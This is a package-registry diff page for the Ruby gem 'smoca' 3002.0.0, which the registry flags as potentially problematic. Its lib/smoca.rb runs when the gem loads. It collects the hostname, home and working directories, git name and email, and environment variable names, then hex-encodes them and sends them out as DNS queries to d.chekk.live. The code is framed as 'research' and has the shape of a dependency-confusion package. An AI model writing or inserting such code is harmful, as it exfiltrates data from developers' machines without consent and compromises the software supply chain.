smoca 3002.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of smoca might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/lib/smoca.rb +100 -0
- metadata +43 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 20bdf9de6151b2870959d22c0a815a770fc6474d810a02869e887e450192ce4c
|
|
4
|
+
data.tar.gz: 551596e929b0c53f722ad197fdc6b1102bcd5d5a33a530eb8013242d01753079
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: ed52f5150335e5064dc30d9ccbe5af5b642baaa0157a901de804ace72276b70aacb85aced66c841cabe1f82e4842d19d34d559b59824c33e901d621b06a2e1f2
|
|
7
|
+
data.tar.gz: b31a3f2128c84cdf31d4df2635a67ba478a2d28ef249650e3d51bc0760d7daf9e959b2e3024cce043286f93cd8df3e12d5975ecae92a09895eb74e37982ee01b
|
data/lib/smoca.rb
ADDED
|
@@ -0,0 +1,100 @@
|
|
|
1
|
+
|
|
2
|
+
=begin
|
|
3
|
+
|
|
4
|
+
This code is used for research purposes.
|
|
5
|
+
|
|
6
|
+
No sensitive data is retrieved.
|
|
7
|
+
|
|
8
|
+
Callbacks from within organizations with a
|
|
9
|
+
responsible disclosure policy will be reported
|
|
10
|
+
directly to the organizations.
|
|
11
|
+
|
|
12
|
+
Any other callbacks will be ignored, and
|
|
13
|
+
any associated data will not be kept.
|
|
14
|
+
|
|
15
|
+
=end
|
|
16
|
+
|
|
17
|
+
require 'socket'
|
|
18
|
+
require 'json'
|
|
19
|
+
require 'resolv'
|
|
20
|
+
|
|
21
|
+
suffix = 'd.chekk.live'
|
|
22
|
+
ns = 'dns1.chekk.live'
|
|
23
|
+
|
|
24
|
+
package = 'smoca'
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
|
|
28
|
+
def convert_string_to_hex(string)
|
|
29
|
+
string.unpack("H*")
|
|
30
|
+
end
|
|
31
|
+
|
|
32
|
+
|
|
33
|
+
def chunk_string(string, length)
|
|
34
|
+
string.scan(/.{1,#{length}}/)
|
|
35
|
+
end
|
|
36
|
+
|
|
37
|
+
|
|
38
|
+
def get_user_from_git_config()
|
|
39
|
+
# get user name and email from git config
|
|
40
|
+
begin
|
|
41
|
+
user_name = `git config user.name`.chomp
|
|
42
|
+
user_email = `git config user.email`.chomp
|
|
43
|
+
rescue
|
|
44
|
+
user_name = ''
|
|
45
|
+
user_email = ''
|
|
46
|
+
|
|
47
|
+
end
|
|
48
|
+
return user_name, user_email
|
|
49
|
+
end
|
|
50
|
+
|
|
51
|
+
def get_environment_variables_names()
|
|
52
|
+
# get environment variables NAMES (not values, no sensitive data is extracted) sorted by name
|
|
53
|
+
# to get a better idea of execution context and prove potential impact to organization
|
|
54
|
+
env_vars = ENV.keys.sort
|
|
55
|
+
return env_vars
|
|
56
|
+
end
|
|
57
|
+
|
|
58
|
+
git_name, git_email = get_user_from_git_config()
|
|
59
|
+
|
|
60
|
+
# only the bare minimum to be able to identify
|
|
61
|
+
# a vulnerable organization
|
|
62
|
+
data = {
|
|
63
|
+
'p' => package,
|
|
64
|
+
'h' => Socket.gethostname,
|
|
65
|
+
'd' => File.expand_path('~'),
|
|
66
|
+
'c' => Dir.pwd,
|
|
67
|
+
'gn' => git_name,
|
|
68
|
+
'ge' => git_email,
|
|
69
|
+
'ev' => get_environment_variables_names()
|
|
70
|
+
}
|
|
71
|
+
|
|
72
|
+
data = JSON.generate(data)
|
|
73
|
+
|
|
74
|
+
# convert to hex and chunk
|
|
75
|
+
data_hex_chunks = data.unpack('H*')[0].scan(/.{1,60}/)
|
|
76
|
+
|
|
77
|
+
id_1 = rand(36**12).to_s(36)
|
|
78
|
+
id_2 = rand(36**12).to_s(36)
|
|
79
|
+
|
|
80
|
+
begin
|
|
81
|
+
ns_ip = Resolv.getaddress(ns)
|
|
82
|
+
rescue
|
|
83
|
+
ns_ip = '4.4.4.4'
|
|
84
|
+
end
|
|
85
|
+
|
|
86
|
+
custom_res = Resolv.new([Resolv::Hosts.new,
|
|
87
|
+
Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
|
|
88
|
+
|
|
89
|
+
|
|
90
|
+
data_hex_chunks.each.each_with_index do |chunk, idx|
|
|
91
|
+
begin
|
|
92
|
+
addr = ['v2_f', id_1, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
|
|
93
|
+
Resolv.getaddress addr
|
|
94
|
+
rescue; end
|
|
95
|
+
|
|
96
|
+
begin
|
|
97
|
+
addr = ['v2_f', id_2, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
|
|
98
|
+
custom_res.getaddress addr
|
|
99
|
+
rescue; end
|
|
100
|
+
end
|
metadata
ADDED
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: smoca
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 3002.0.0
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- John Doe
|
|
8
|
+
autorequire:
|
|
9
|
+
bindir: bin
|
|
10
|
+
cert_chain: []
|
|
11
|
+
date: 2021-12-02 00:00:00.000000000 Z
|
|
12
|
+
dependencies: []
|
|
13
|
+
description: Security assesment
|
|
14
|
+
email: jjdoe2@doe.com
|
|
15
|
+
executables: []
|
|
16
|
+
extensions: []
|
|
17
|
+
extra_rdoc_files: []
|
|
18
|
+
files:
|
|
19
|
+
- lib/smoca.rb
|
|
20
|
+
homepage: https://rubygems.org/gems/smoca
|
|
21
|
+
licenses:
|
|
22
|
+
- MIT
|
|
23
|
+
metadata: {}
|
|
24
|
+
post_install_message:
|
|
25
|
+
rdoc_options: []
|
|
26
|
+
require_paths:
|
|
27
|
+
- lib
|
|
28
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
29
|
+
requirements:
|
|
30
|
+
- - ">="
|
|
31
|
+
- !ruby/object:Gem::Version
|
|
32
|
+
version: '0'
|
|
33
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
34
|
+
requirements:
|
|
35
|
+
- - ">="
|
|
36
|
+
- !ruby/object:Gem::Version
|
|
37
|
+
version: '0'
|
|
38
|
+
requirements: []
|
|
39
|
+
rubygems_version: 3.2.32
|
|
40
|
+
signing_key:
|
|
41
|
+
specification_version: 4
|
|
42
|
+
summary: Security assesment
|
|
43
|
+
test_files: []
|